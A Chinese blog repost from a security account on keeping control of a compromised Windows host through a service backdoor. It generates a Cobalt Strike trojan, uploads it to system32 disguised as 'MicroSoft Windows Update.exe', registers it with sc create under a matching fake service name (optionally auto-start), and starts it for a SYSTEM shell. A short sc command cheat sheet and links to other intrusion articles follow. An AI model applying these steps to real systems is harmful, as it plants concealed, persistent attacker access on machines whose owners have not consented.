Windows权限维持-Windows服务

Posted NowSec

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Windows权限维持-Windows服务相关的知识,希望对你有一定的参考价值。


  在获取到目标主机的权限后,一般需要使用一些后门技术对主机的权限进行维持,以保持我们对目标主机的长期控制在获取到目标主机的权限后,一般需要使用一些后门技术对主机的权限进行维持,以保持我们对目标主机的长期控制。

前提

使用服务的方式创建后面需要先获取的目标机器的system权限,并且留的后门反弹回的shell也会是system权限。

生成木马

选择Attack>Packages>Windows Executable

配置好listener和OutPut后点击Generate生成并保存木马

上传木马

上传木马到目标主机的system32目录下

beacon> upload /root/MicroSoft Windows Update.exe


查看上传结果

创建服务

shell sc create MicroSoft_Windows_Update  binPath= "C:\\Windows\\system32\\MicroSoft Windows Update.exe"

如需服务自启动,可在创建服务时加上参数start=auto

启动服务

查看返回的shell

# 创建一个服务
sc create ServiceName binPath= "FilePath"  # 注意在binPath=后需要有一个空格
# 启动一个服务
sc start ServiceName
# 删除一个服务
sc delete ServiceName

加入我的星球

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

以上是关于Windows权限维持-Windows服务的主要内容,如果未能解决你的问题,请参考以下文章

SC实现隐藏Windows服务维持权限

Windows权限维持——计划任务

全!最新Windows后渗透之权限维持

Windows权限维持

操作系统权限维持之Windows系统-克隆账号维持后门

操作系统权限维持之Linux系统-SSHKey后门